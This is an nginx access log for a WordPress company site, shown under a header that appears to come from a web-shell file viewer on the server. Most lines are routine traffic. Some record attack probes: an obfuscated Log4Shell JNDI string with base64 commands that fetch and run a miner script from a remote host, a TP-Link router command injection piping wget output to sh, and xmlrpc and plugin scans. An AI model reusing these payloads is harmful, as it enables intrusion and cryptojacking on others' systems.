HEX
Server: nginx/1.16.1
System: Linux ecs-04358622 4.19.90-2107.6.0.0100.oe1.bclinux.x86_64 #1 SMP Wed Dec 1 19:59:44 CST 2021 x86_64
User: nginx (994)
PHP: 8.0.0
Disabled: NONE
Upload Files
File: //home/logs/cqqizhou_access_2025-09-16.log
42.236.17.37 - - [16/Sep/2025:00:08:14 +0800] "GET / HTTP/1.1" 200 39369 "http://cqqizhou.com" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36; 360Spider"
14.108.233.129 - - [16/Sep/2025:00:17:17 +0800] "GET / HTTP/1.1" 200 39369 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 Edg/138.0.0.0"
14.108.233.129 - - [16/Sep/2025:00:17:17 +0800] "GET /wp-content/uploads/2025/07/1751425283-qizhou.kf_.qq_.com_.webp HTTP/1.1" 200 16864 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 Edg/138.0.0.0"
14.108.233.129 - - [16/Sep/2025:00:17:18 +0800] "GET /wp-content/uploads/revslider/slider-1/1750929639-yuanjing_Slider_3840%C3%972160_20250626171955-scaled.webp HTTP/1.1" 200 203290 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 Edg/138.0.0.0"
14.108.233.129 - - [16/Sep/2025:00:17:18 +0800] "GET /wp-content/uploads/2025/07/1753456723-%E5%8F%8C%E7%9B%B8%E9%92%A2roduct_Single600.webp HTTP/1.1" 200 22790 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 Edg/138.0.0.0"
14.108.233.129 - - [16/Sep/2025:00:17:18 +0800] "GET /wp-content/uploads/2025/07/1753456770-%E7%83%AD%E9%95%80%E9%94%8C%E5%8D%B7product_Single600.webp HTTP/1.1" 200 27502 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 Edg/138.0.0.0"
14.108.233.129 - - [16/Sep/2025:00:17:18 +0800] "GET /wp-content/uploads/2025/07/1753453127-%E4%BD%99%E5%8D%B7product_Single600%C3%97284.webp HTTP/1.1" 200 18744 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 Edg/138.0.0.0"
14.108.233.129 - - [16/Sep/2025:00:17:18 +0800] "GET /wp-content/uploads/2025/07/1753453096-%E5%8F%8C%E7%9B%B8%E9%92%A2product_Single600%C3%97284.webp HTTP/1.1" 200 14562 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 Edg/138.0.0.0"
36.133.115.36 - - [16/Sep/2025:00:17:19 +0800] "POST /wp-cron.php?doing_wp_cron=1757953039.3990418910980224609375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
14.108.233.129 - - [16/Sep/2025:00:17:19 +0800] "GET /wp-json/sliderrevolution/sliders/1?srengine=7&slideid=3 HTTP/1.1" 200 2292 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 Edg/138.0.0.0"
14.108.233.129 - - [16/Sep/2025:00:17:19 +0800] "GET /wp-json/sliderrevolution/sliders/1?srengine=7&slideid=2 HTTP/1.1" 200 2058 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 Edg/138.0.0.0"
14.108.233.129 - - [16/Sep/2025:00:17:19 +0800] "GET /wp-content/uploads/2025/07/1753587901-Slider_3840%C3%972160_20250727-scaled.webp HTTP/1.1" 200 141034 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 Edg/138.0.0.0"
14.108.233.129 - - [16/Sep/2025:00:17:19 +0800] "GET /wp-content/uploads/revslider/slider-1/1750861156-logistics_Slider_3840%C3%972160_20250625191356-scaled.webp HTTP/1.1" 200 197360 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 Edg/138.0.0.0"
14.108.233.129 - - [16/Sep/2025:00:18:19 +0800] "GET / HTTP/1.1" 200 39369 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 Edg/138.0.0.0"
36.133.115.36 - - [16/Sep/2025:00:18:21 +0800] "POST /wp-cron.php?doing_wp_cron=1757953101.0906949043273925781250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
14.108.233.129 - - [16/Sep/2025:00:18:21 +0800] "GET /wp-json/sliderrevolution/sliders/1?srengine=7&slideid=2 HTTP/1.1" 200 2058 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 Edg/138.0.0.0"
14.108.233.129 - - [16/Sep/2025:00:18:21 +0800] "GET /wp-json/sliderrevolution/sliders/1?srengine=7&slideid=3 HTTP/1.1" 200 2292 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 Edg/138.0.0.0"
14.108.233.129 - - [16/Sep/2025:00:18:22 +0800] "GET /wp-content/uploads/2025/07/1750174127-Marketing1920x800_3.webp HTTP/1.1" 200 52790 "http://cqqizhou.com/wp-content/uploads/elementor/css/post-1666.css?ver=1756373176" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 Edg/138.0.0.0"
14.108.233.129 - - [16/Sep/2025:00:18:25 +0800] "GET /wp-content/uploads/2025/07/1751829454-Smart-warehousing800x500.webp HTTP/1.1" 200 79504 "http://cqqizhou.com/wp-content/uploads/elementor/css/post-1666.css?ver=1756373176" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 Edg/138.0.0.0"
14.108.233.129 - - [16/Sep/2025:00:18:25 +0800] "GET /wp-content/uploads/2025/07/1753454089-Article_images_W900px.webp HTTP/1.1" 200 27552 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 Edg/138.0.0.0"
14.108.233.129 - - [16/Sep/2025:00:18:25 +0800] "GET /wp-content/uploads/2025/07/1753454299-Article_images_W900px.webp HTTP/1.1" 200 52418 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 Edg/138.0.0.0"
1.192.195.8 - - [16/Sep/2025:00:20:23 +0800] "GET / HTTP/1.0" 200 165852 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 5.)"
1.192.195.11 - - [16/Sep/2025:00:20:23 +0800] "GET / HTTP/1.0" 200 165852 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 5.)"
14.108.233.129 - - [16/Sep/2025:00:22:23 +0800] "GET /wp-content/uploads/2025/07/1751967322-Storage-processing_images_W900%C3%97300.webp HTTP/1.1" 200 23120 "http://cqqizhou.com/wp-content/uploads/elementor/css/post-1666.css?ver=1756373176" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 Edg/138.0.0.0"
14.108.233.129 - - [16/Sep/2025:00:22:32 +0800] "GET /wp-content/uploads/revslider/slider-1/1750929639-yuanjing_Slider_3840%C3%972160_20250626171955-scaled-50x100.webp HTTP/1.1" 200 1784 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 Edg/138.0.0.0"
14.108.233.129 - - [16/Sep/2025:00:23:29 +0800] "GET /logistics/ HTTP/1.1" 200 22410 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 Edg/138.0.0.0"
14.108.233.129 - - [16/Sep/2025:00:23:29 +0800] "GET /wp-content/uploads/2025/07/1751864682-Logistics800x500_2.webp HTTP/1.1" 200 27420 "http://cqqizhou.com/logistics/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 Edg/138.0.0.0"
14.108.233.129 - - [16/Sep/2025:00:23:29 +0800] "GET /wp-content/uploads/2025/07/1751864664-Logistics800x500_1.webp HTTP/1.1" 200 76914 "http://cqqizhou.com/logistics/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 Edg/138.0.0.0"
14.108.233.129 - - [16/Sep/2025:00:23:29 +0800] "GET /wp-content/uploads/2025/07/1753407887-Logistics_Banner2000%C3%97400px-%E6%8B%B7%E8%B4%9D.webp HTTP/1.1" 200 18866 "http://cqqizhou.com/logistics/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 Edg/138.0.0.0"
14.108.233.129 - - [16/Sep/2025:00:23:34 +0800] "GET /news/ HTTP/1.1" 200 25256 "http://cqqizhou.com/logistics/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 Edg/138.0.0.0"
14.108.233.129 - - [16/Sep/2025:00:23:34 +0800] "GET /wp-content/uploads/2025/09/1756868614-20250903104654_74_5.webp HTTP/1.1" 200 47858 "http://cqqizhou.com/news/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 Edg/138.0.0.0"
14.108.233.129 - - [16/Sep/2025:00:23:34 +0800] "GET /wp-content/uploads/2025/08/1755826456-DSC01841.webp HTTP/1.1" 200 87046 "http://cqqizhou.com/news/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 Edg/138.0.0.0"
14.108.233.129 - - [16/Sep/2025:00:23:34 +0800] "GET /wp-content/uploads/2025/08/1755826390-DSC01765.webp HTTP/1.1" 200 71514 "http://cqqizhou.com/news/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 Edg/138.0.0.0"
14.108.233.129 - - [16/Sep/2025:00:23:34 +0800] "GET /wp-content/uploads/2025/07/1753455746-DSC01472.webp HTTP/1.1" 200 31854 "http://cqqizhou.com/news/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 Edg/138.0.0.0"
14.108.233.129 - - [16/Sep/2025:00:23:34 +0800] "GET /wp-content/uploads/2025/07/1753453986-Article_images_W900px.webp HTTP/1.1" 200 57364 "http://cqqizhou.com/news/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 Edg/138.0.0.0"
14.108.233.129 - - [16/Sep/2025:00:23:34 +0800] "GET /wp-content/uploads/2025/07/1753410289-News2000%C3%97400_202571.webp HTTP/1.1" 200 17830 "http://cqqizhou.com/news/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 Edg/138.0.0.0"
14.108.233.129 - - [16/Sep/2025:00:23:44 +0800] "GET /contacts/ HTTP/1.1" 200 21496 "http://cqqizhou.com/news/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 Edg/138.0.0.0"
14.108.233.129 - - [16/Sep/2025:00:23:44 +0800] "GET /wp-content/uploads/2025/07/1750005875-qizhou_map2025616.webp HTTP/1.1" 200 348798 "http://cqqizhou.com/contacts/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 Edg/138.0.0.0"
14.108.233.129 - - [16/Sep/2025:00:23:44 +0800] "GET /wp-content/uploads/2025/06/1750674554-qizhoudalou2000x400_2025624.webp HTTP/1.1" 200 47874 "http://cqqizhou.com/contacts/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 Edg/138.0.0.0"
36.133.115.36 - - [16/Sep/2025:00:23:45 +0800] "POST /wp-cron.php?doing_wp_cron=1757953425.4071609973907470703125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
14.108.233.129 - - [16/Sep/2025:00:23:45 +0800] "GET /wp-json/contact-form-7/v1/contact-forms/158/refill HTTP/1.1" 200 33 "http://cqqizhou.com/contacts/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 Edg/138.0.0.0"
14.108.233.129 - - [16/Sep/2025:00:23:45 +0800] "GET /wp-json/contact-form-7/v1/contact-forms/158/feedback/schema HTTP/1.1" 200 358 "http://cqqizhou.com/contacts/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 Edg/138.0.0.0"
14.108.233.129 - - [16/Sep/2025:00:24:19 +0800] "GET /services/ HTTP/1.1" 200 25528 "http://cqqizhou.com/contacts/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 Edg/138.0.0.0"
14.108.233.129 - - [16/Sep/2025:00:24:19 +0800] "GET /wp-content/uploads/2025/07/1751829518-Precision-processing-services800x500.webp HTTP/1.1" 200 28964 "http://cqqizhou.com/services/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 Edg/138.0.0.0"
14.108.233.129 - - [16/Sep/2025:00:24:19 +0800] "GET /wp-content/uploads/2025/07/1751857929-3D-one-stop-supply-chain-service-W900px2.webp HTTP/1.1" 200 38362 "http://cqqizhou.com/services/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 Edg/138.0.0.0"
14.108.233.129 - - [16/Sep/2025:00:24:19 +0800] "GET /wp-content/uploads/2025/07/1753405252-Services_Banner2000%C3%97400px2.webp HTTP/1.1" 200 23730 "http://cqqizhou.com/services/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 Edg/138.0.0.0"
36.133.115.36 - - [16/Sep/2025:00:35:06 +0800] "POST /wp-cron.php?doing_wp_cron=1757954106.5756180286407470703125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
45.142.193.144 - - [16/Sep/2025:00:35:06 +0800] "GET / HTTP/1.1" 200 33465 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [16/Sep/2025:00:39:44 +0800] "POST /wp-cron.php?doing_wp_cron=1757954384.6160809993743896484375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
124.221.245.78 - - [16/Sep/2025:00:39:44 +0800] "GET / HTTP/1.1" 200 33465 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [16/Sep/2025:00:41:13 +0800] "POST /wp-cron.php?doing_wp_cron=1757954473.5764529705047607421875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
176.65.148.40 - - [16/Sep/2025:00:41:13 +0800] "GET / HTTP/1.1" 200 33465 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [16/Sep/2025:00:42:57 +0800] "POST /wp-cron.php?doing_wp_cron=1757954577.4472420215606689453125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.6 - - [16/Sep/2025:00:42:57 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [16/Sep/2025:00:50:09 +0800] "POST /wp-cron.php?doing_wp_cron=1757955009.6334419250488281250000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.70 - - [16/Sep/2025:00:50:09 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [16/Sep/2025:00:51:28 +0800] "POST /wp-cron.php?doing_wp_cron=1757955088.4733340740203857421875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
45.142.193.144 - - [16/Sep/2025:00:51:28 +0800] "GET / HTTP/1.1" 200 33466 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [16/Sep/2025:00:51:47 +0800] "POST /wp-cron.php?doing_wp_cron=1757955107.6993429660797119140625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
80.75.212.83 - - [16/Sep/2025:00:51:47 +0800] "GET /t%28%27$%7B$%7Benv:NaN:-j%7Dndi$%7Benv:NaN:-:%7D$%7Benv:NaN:-l%7Ddap$%7Benv:NaN:-:%7D//31.15.16.252:3306/TomcatBypass/Command/Base64/ZXhwb3J0IEhPTUU9L3RtcC87IGN1cmwgLXMgLUwgaHR0cDovLzMxLjE1LjE2LjI1Mi9zY3JpcHRzLzR0aGVwb29sX21pbmVyX3Rlc3Quc2ggfCBMQ19BTEw9ZW5fVVMuVVRGLTggYmFzaCAtczsgd2dldCAtcU8tIGh0dHA6Ly8zMS4xNS4xNi4yNTIvc2NyaXB0cy80dGhlcG9vbF9taW5lci5zaCB8IExDX0FMTD1lbl9VUy5VVEYtOCBiYXNoIC1z%7D%27%29 HTTP/1.1" 301 5 "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//31.15.16.252:3306/TomcatBypass/Command/Base64/ZXhwb3J0IEhPTUU9L3RtcC87IGN1cmwgLXMgLUwgaHR0cDovLzMxLjE1LjE2LjI1Mi9zY3JpcHRzLzR0aGVwb29sX21pbmVyX3Rlc3Quc2ggfCBMQ19BTEw9ZW5fVVMuVVRGLTggYmFzaCAtczsgd2dldCAtcU8tIGh0dHA6Ly8zMS4xNS4xNi4yNTIvc2NyaXB0cy80dGhlcG9vbF9taW5lci5zaCB8IExDX0FMTD1lbl9VUy5VVEYtOCBiYXNoIC1z}')" "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//31.15.16.252:3306/TomcatBypass/Command/Base64/ZXhwb3J0IEhPTUU9L3RtcC87IGN1cmwgLXMgLUwgaHR0cDovLzMxLjE1LjE2LjI1Mi9zY3JpcHRzLzR0aGVwb29sX21pbmVyX3Rlc3Quc2ggfCBMQ19BTEw9ZW5fVVMuVVRGLTggYmFzaCAtczsgd2dldCAtcU8tIGh0dHA6Ly8zMS4xNS4xNi4yNTIvc2NyaXB0cy80dGhlcG9vbF9taW5lci5zaCB8IExDX0FMTD1lbl9VUy5VVEYtOCBiYXNoIC1z}')"
80.75.212.83 - - [16/Sep/2025:00:51:49 +0800] "GET /t%28%27%7B%7Benv:NaN:-j%7Dndi%7Benv:NaN:-:%7D%7Benv:NaN:-l%7Ddap%7Benv:NaN:-:%7D/31.15.16.252:3306/TomcatBypass/Command/Base64/ZXhwb3J0IEhPTUU9L3RtcC87IGN1cmwgLXMgLUwgaHR0cDovLzMxLjE1LjE2LjI1Mi9zY3JpcHRzLzR0aGVwb29sX21pbmVyX3Rlc3Quc2ggfCBMQ19BTEw9ZW5fVVMuVVRGLTggYmFzaCAtczsgd2dldCAtcU8tIGh0dHA6Ly8zMS4xNS4xNi4yNTIvc2NyaXB0cy80dGhlcG9vbF9taW5lci5zaCB8IExDX0FMTD1lbl9VUy5VVEYtOCBiYXNoIC1z HTTP/1.1" 404 31381 "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//31.15.16.252:3306/TomcatBypass/Command/Base64/ZXhwb3J0IEhPTUU9L3RtcC87IGN1cmwgLXMgLUwgaHR0cDovLzMxLjE1LjE2LjI1Mi9zY3JpcHRzLzR0aGVwb29sX21pbmVyX3Rlc3Quc2ggfCBMQ19BTEw9ZW5fVVMuVVRGLTggYmFzaCAtczsgd2dldCAtcU8tIGh0dHA6Ly8zMS4xNS4xNi4yNTIvc2NyaXB0cy80dGhlcG9vbF9taW5lci5zaCB8IExDX0FMTD1lbl9VUy5VVEYtOCBiYXNoIC1z}')" "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//31.15.16.252:3306/TomcatBypass/Command/Base64/ZXhwb3J0IEhPTUU9L3RtcC87IGN1cmwgLXMgLUwgaHR0cDovLzMxLjE1LjE2LjI1Mi9zY3JpcHRzLzR0aGVwb29sX21pbmVyX3Rlc3Quc2ggfCBMQ19BTEw9ZW5fVVMuVVRGLTggYmFzaCAtczsgd2dldCAtcU8tIGh0dHA6Ly8zMS4xNS4xNi4yNTIvc2NyaXB0cy80dGhlcG9vbF9taW5lci5zaCB8IExDX0FMTD1lbl9VUy5VVEYtOCBiYXNoIC1z}')"
36.133.115.36 - - [16/Sep/2025:00:55:18 +0800] "POST /wp-cron.php?doing_wp_cron=1757955318.2579419612884521484375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
149.50.103.48 - - [16/Sep/2025:00:55:18 +0800] "GET / HTTP/1.1" 200 33465 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
23.95.184.98 - - [16/Sep/2025:01:01:26 +0800] "GET / HTTP/1.1" 200 39369 "-" "Mozilla/5.0"
36.133.115.36 - - [16/Sep/2025:01:08:03 +0800] "POST /wp-cron.php?doing_wp_cron=1757956083.6924519538879394531250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
196.251.84.253 - - [16/Sep/2025:01:08:04 +0800] "GET / HTTP/1.0" 200 151897 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0"
36.133.115.36 - - [16/Sep/2025:01:15:52 +0800] "POST /wp-cron.php?doing_wp_cron=1757956552.6948409080505371093750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
50.30.32.22 - - [16/Sep/2025:01:15:52 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
36.133.115.36 - - [16/Sep/2025:01:23:50 +0800] "POST /wp-cron.php?doing_wp_cron=1757957030.8675899505615234375000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
43.133.69.37 - - [16/Sep/2025:01:23:51 +0800] "GET / HTTP/1.1" 200 33465 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [16/Sep/2025:01:25:49 +0800] "POST /wp-cron.php?doing_wp_cron=1757957149.3731939792633056640625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
45.135.193.100 - - [16/Sep/2025:01:25:49 +0800] "GET / HTTP/1.1" 301 5 "-" "-"
36.133.115.36 - - [16/Sep/2025:01:39:50 +0800] "POST /wp-cron.php?doing_wp_cron=1757957990.1403479576110839843750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
43.167.157.80 - - [16/Sep/2025:01:39:50 +0800] "GET /wp-json/ HTTP/1.1" 200 19172 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
42.236.101.229 - - [16/Sep/2025:01:40:05 +0800] "GET / HTTP/1.1" 200 39369 "http://cqqizhou.com" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36; 360Spider"
87.120.191.70 - - [16/Sep/2025:01:40:27 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [16/Sep/2025:01:42:10 +0800] "POST /wp-cron.php?doing_wp_cron=1757958130.7368628978729248046875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
115.159.33.43 - - [16/Sep/2025:01:42:10 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36"
36.133.115.36 - - [16/Sep/2025:01:46:39 +0800] "POST /wp-cron.php?doing_wp_cron=1757958399.0184149742126464843750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
45.142.193.144 - - [16/Sep/2025:01:46:39 +0800] "GET / HTTP/1.1" 200 33465 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
43.128.149.102 - - [16/Sep/2025:01:48:42 +0800] "GET /wp-content/plugins/revslider/ HTTP/1.1" 200 31 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
121.185.148.144 - - [16/Sep/2025:01:49:19 +0800] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//144.172.103.95/router.tplink.sh%20-O-%7Csh) HTTP/1.1" 499 0 "-" "-"
36.133.115.36 - - [16/Sep/2025:01:49:20 +0800] "POST /wp-cron.php?doing_wp_cron=1757958560.0663380622863769531250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
121.185.148.144 - - [16/Sep/2025:01:49:20 +0800] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//144.172.103.95/router.tplink.sh%20-O-%7Csh) HTTP/1.1" 499 0 "-" "-"
36.133.115.36 - - [16/Sep/2025:01:52:20 +0800] "POST /wp-cron.php?doing_wp_cron=1757958740.2835240364074707031250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
92.222.181.205 - - [16/Sep/2025:01:52:20 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
206.168.34.51 - - [16/Sep/2025:01:52:27 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
